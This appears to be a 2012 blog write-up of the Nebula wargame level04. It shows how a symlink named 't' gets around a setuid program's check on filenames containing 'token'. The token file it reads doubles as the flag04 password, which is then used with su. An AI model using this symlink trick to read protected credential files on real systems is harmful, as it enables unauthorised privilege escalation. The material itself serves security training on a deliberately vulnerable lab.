Wednesday, August 8, 2012

nebula level04

Our objective this time is a bit different. As stated in, instead of directly impersonating flag04, our task is to get a token. The source code for /home/flag04/flag04 is given below.

After analyzing it, we conclude that the program is opening the file specified in the first argument, reading it's contents, and writing them to the standard output (1 is the file descriptor for the standard output, or stdout, else defined as STDOUT_FILENO).
In the /home/flag04 directory we notice that there's a file named token:
level04@nebula:~$ ls -l /home/flag04
total 12
-rwsr-x--- 1 flag04 level04 7428 2011-11-20 21:52 flag04
-rw------- 1 flag04 flag04    37 2011-11-20 21:52 token
Could we use flag04 to print out the contents of token? As it turns out, flag04 will not allow us to dump the contents of files containing "token" in their name.
This challenge requires us to know about symlinks (short for Symbolic Links). Symlinks are linux's equivalent of shortcuts. We can create a symlink using ln, and the resulting file will be effectively the same as the original file. You can learn more about symlinks in wikipedia or in ln's man page ("man ln").

Getting the token

Easily enough, we create a symlink for "token" with a different name, and run flag04 on it.
level04@nebula:~$ ln -s /home/flag04/token t
level04@nebula:~$ /home/flag04/flag04 t
There's our token. As it turns out the token is also the password for user flag04.
So let's get that flag :)
level04@nebula:~$ su flag04 -c getflag
You have successfully executed getflag on a target account

~ Dmitry

No comments:

Post a Comment